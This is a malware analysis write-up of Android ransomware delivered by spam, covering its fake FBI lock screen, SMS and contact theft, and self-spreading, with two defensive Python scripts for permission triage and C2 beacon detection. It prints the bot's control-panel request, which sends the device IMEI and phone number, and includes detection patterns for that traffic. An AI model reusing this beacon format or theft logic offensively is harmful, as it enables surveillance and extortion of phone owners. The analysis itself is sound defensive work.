New Ransomware in the Mobile Environment

The new malware trend that has caused so many problems over the last year is widely known: the infamous ransomware (CryptoWall, CryptoLocker and their derivatives).

Although we had already seen samples in the mobile environment (Koler), it was not common to find traditional spam carrying such malicious applications, until now.

A generic spam e-mail we received some days ago included a suspicious attachment named “Check Updates.apk”, probably pretending to be a Flash Player update.

At first glance, just by reviewing the embedded images and HTML documents, the application is far from being a software update.

These documents, which are presented to the victim as part of the scam, follow the usual scheme. In this case the scam is as follows: the FBI has detected, through the PRISM platform, that the user has browsed forbidden web pages and must pay a fine.

The app installation is pretty simple, and after opening it a video player menu is displayed (which is obviously fraudulent).

After a few seconds the disclaimer window pops up, pinned to the screen, preventing the end user from closing it or using other apps.

This message, unlike Koler’s, always remains the same no matter where the end user is located. Here are some screenshots taken during this step:

Once the mobile device is locked and the ransom requested, the next step is the purchase of a PayPal MyCash card charged with $500, whose card number the victim must provide to the botmaster through the app panel, as seen in the image above.

From a technical point of view the app is pretty simple: it requires a large number of privileges and uses the platform features like a normal app (it does not use exploits or require root privileges). These are its main features:

  • The ransom disclaimer window is generated as a system alert window, shown over other applications and windows.
  • The crypto system used is AES from the standard library. The key and salt used are always the same (derived with PBKDF2WithHmacSHA1):
  • Although the encryption and decryption code is complete, there is no evidence from the tests performed in our lab that the app actually encrypts the external storage (target: /sdcard/Android/).
  • The app uses a third-party library named Volley for connection management.
  • To frighten the end user, some personal information is shown: browser bookmarks, the end user’s photo (taken with the front camera) and a geolocation based on the device IP.
  • The main functionalities are:
  1. SMS and contacts delivery to the malicious server
  2. Incoming SMS capture
  3. SMS delivery through the device
  4. Encrypt/decrypt the external SD storage
  5. Device lock and unlock
  • SMS spreading: the malicious server sends an SMS template to the device, which is used to send an SMS containing the APK URL to the whole contact list (this was also observed in recent Koler samples).
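Triaging a sample by its requested permissions is a quick check that maps directly onto the feature list above. The following is an added example, not code from the original analysis: it parses the output of a permission dump (such as `aapt dump permissions <apk>` or `adb shell dumpsys package <pkg>`, both of which print the `android.permission.*` names) and reports which of the listed capabilities those permissions would enable. The package names and the dumps themselves are constructed for the example.

```python
"""Map an APK's requested permissions to the capabilities described above.

Added example, not code from the original write-up. Works on any text that
contains android.permission.* names, e.g. the output of
`aapt dump permissions app.apk` or `adb shell dumpsys package <pkg>`.
"""
import re

# Capability (as listed in the write-up) -> Android permissions that enable it.
CAPABILITIES = {
    "ransom window over other apps": {"android.permission.SYSTEM_ALERT_WINDOW"},
    "incoming SMS capture": {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"},
    "SMS delivery / spreading": {"android.permission.SEND_SMS"},
    "contacts exfiltration": {"android.permission.READ_CONTACTS"},
    "victim photo from front camera": {"android.permission.CAMERA"},
    "external storage encryption": {"android.permission.WRITE_EXTERNAL_STORAGE"},
    "control panel communication": {"android.permission.INTERNET"},
}

# Capabilities whose combination matches the profile of this family.
RANSOMWARE_PROFILE = {
    "ransom window over other apps",
    "external storage encryption",
    "control panel communication",
}

PERMISSION_RE = re.compile(r"android\.permission\.[A-Z_]+")

# Constructed sample in `aapt dump permissions` format; the package name is a placeholder.
SAMPLE_DUMP = """\
package: com.example.checkupdates
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.SYSTEM_ALERT_WINDOW'
uses-permission: name='android.permission.RECEIVE_SMS'
uses-permission: name='android.permission.SEND_SMS'
uses-permission: name='android.permission.READ_CONTACTS'
uses-permission: name='android.permission.CAMERA'
uses-permission: name='android.permission.WRITE_EXTERNAL_STORAGE'
"""

# Constructed dump of what a genuine video player would plausibly request, for comparison.
BENIGN_DUMP = """\
package: com.example.videoplayer
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.WAKE_LOCK'
"""


def extract_permissions(dump_text):
    """Return the set of android.permission.* names found in the dump."""
    return set(PERMISSION_RE.findall(dump_text))


def triage(dump_text):
    """Return {capability: [matching permissions]} for every capability the dump enables."""
    perms = extract_permissions(dump_text)
    hits = {}
    for capability, needed in CAPABILITIES.items():
        matched = sorted(perms & needed)
        if matched:
            hits[capability] = matched
    return hits


def matches_profile(dump_text):
    """True when the sample holds overlay + storage + network and at least one SMS capability."""
    caps = set(triage(dump_text))
    has_sms = bool(caps & {"incoming SMS capture", "SMS delivery / spreading"})
    return RANSOMWARE_PROFILE <= caps and has_sms


if __name__ == "__main__":
    for name, dump in (("sample", SAMPLE_DUMP), ("benign", BENIGN_DUMP)):
        print(name, "-> profile match:", matches_profile(dump))
        for capability, perms in triage(dump).items():
            print("   ", capability, ":", ", ".join(perms))
```

A video player that asks for SYSTEM_ALERT_WINDOW, both SMS permissions, contacts and the camera at install time is exactly the mismatch this check is meant to surface; the capability labels are the ones from the feature list, so a hit reads directly as "this app can do X".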

Control Panel

The Control Panel URL is hardcoded in the bot code. Once the URL is resolved, it is periodically queried to get new commands (over HTTP, with JSON answers):

GET /pha?android_version=4.1.2&id=xxxxxxxxxx&phone_number=xxxxxxxxx&client_version=1.03&imei=xxxxxxxxxxxxxxxx&name=sdk

During bot registration, an SMS template and the geolocation are also received, as explained before:

{"sms_template": "OMG!!! Guess who's on a video here, you will not believe it!!!  hxxp://"}

{"city": "Madrid", "ip": "", "lon": yy.yyy, "lat": zz.zzz, "country_code": "ES", "country_name": "Spain"}

The server also implements a backdoor in order to control and query the bot. This server hosts an “app-download” website (similar to a third-party market) which also serves the fake application.
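The beacon and the registration answers above give a defender two concrete things to look for in network logs. The following is an added example, not part of the original analysis: it scans constructed proxy log lines for the `/pha` polling request carrying the parameter set shown above, and extracts the spreading URL and geolocation from the JSON answers. The hostnames, identifiers and the URL inside the SMS template are constructed placeholders, as are the log lines themselves.

```python
"""Detect the bot's control panel beacon in proxy logs and pull IoCs from its JSON answers.

Added example, not code from the original write-up. Log lines, hostnames,
identifiers and the URL inside the SMS template are constructed placeholders.
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

# Polling request seen in the write-up:
#   GET /pha?android_version=...&id=...&phone_number=...&client_version=...&imei=...&name=...
BEACON_PATH = "/pha"
BEACON_PARAMS = {"android_version", "id", "phone_number", "client_version", "imei", "name"}

# Matches both live and defanged (hxxp://) URLs so the spreading link can be recorded as an IoC.
URL_RE = re.compile(r"h(?:tt|xx)ps?://\S+")

# Constructed proxy log: "<timestamp> <client-ip> <method> <url> <status>".
LOG_LINES = [
    "2015-01-12T10:01:02Z 10.0.0.5 GET http://c2.example.invalid/pha?android_version=4.1.2"
    "&id=0000000000&phone_number=000000000&client_version=1.03&imei=000000000000000&name=sdk 200",
    "2015-01-12T10:01:03Z 10.0.0.7 GET http://www.example.com/index.html 200",
    # Same path but without the full parameter set: not counted as a beacon.
    "2015-01-12T10:01:05Z 10.0.0.5 GET http://c2.example.invalid/pha?android_version=4.1.2&id=0 200",
]

# Constructed registration answers in the shape shown above (placeholder URL and coordinates).
SMS_TEMPLATE_ANSWER = (
    '{"sms_template": "OMG!!! Guess who\'s on a video here, you will not believe it!!!  '
    'hxxp://apk-host.example.invalid/Check_Updates.apk"}'
)
GEO_ANSWER = (
    '{"city": "Madrid", "ip": "", "lon": 0.0, "lat": 0.0, '
    '"country_code": "ES", "country_name": "Spain"}'
)


def is_beacon(url):
    """True when the URL is the /pha poll carrying every parameter the bot sends."""
    parts = urlsplit(url)
    return parts.path == BEACON_PATH and BEACON_PARAMS <= set(parse_qs(parts.query))


def find_beacons(lines):
    """Return one record per beaconing request: time, client, C2 host, client version, masked IMEI."""
    records = []
    for line in lines:
        timestamp, client, method, url, _status = line.split()
        if method != "GET" or not is_beacon(url):
            continue
        parts = urlsplit(url)
        query = parse_qs(parts.query)
        records.append({
            "time": timestamp,
            "client": client,
            "c2_host": parts.hostname,
            "client_version": query["client_version"][0],
            # Keep only the IMEI tail so the report can be shared without exposing the device id.
            "imei_tail": query["imei"][0][-4:],
        })
    return records


def extract_answer_iocs(body):
    """Pull the spreading URL(s) and geolocation out of a registration answer."""
    data = json.loads(body)
    iocs = {}
    if "sms_template" in data:
        iocs["sms_template"] = data["sms_template"]
        iocs["spread_urls"] = URL_RE.findall(data["sms_template"])
    if "country_code" in data:
        iocs["geo"] = {k: data[k] for k in ("city", "country_code", "country_name")}
    return iocs


if __name__ == "__main__":
    for record in find_beacons(LOG_LINES):
        print("beacon:", record)
    for answer in (SMS_TEMPLATE_ANSWER, GEO_ANSWER):
        print("answer IoCs:", extract_answer_iocs(answer))
```

Matching on the full parameter set rather than on the path alone keeps the rule specific: `/pha` is short enough to collide with legitimate traffic, but the combination of `imei`, `phone_number` and `client_version` in a single GET is characteristic of this bot. The URL extracted from the SMS template is the same link that will be sent to the victim's contacts, which makes it worth blocking at the mail and web gateway in addition to the control panel host.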

Conclusion and Countermeasures 

The ransomware “boom” is starting to find new distribution channels. Despite being pretty simple apps, they achieve their goal of extorting the end user. The methods used are heavily social engineering oriented, but new functionalities are added constantly (SMS capture, spreading).

As a countermeasure, it is recommended to keep “install from untrusted sources” disabled and to filter out e-mails with .apk attachments.

If the malicious application is already installed, the device can be cleaned with “adb uninstall” (this requires USB debugging to be enabled) or by rebooting the system into safe mode in order to delete the app afterwards.
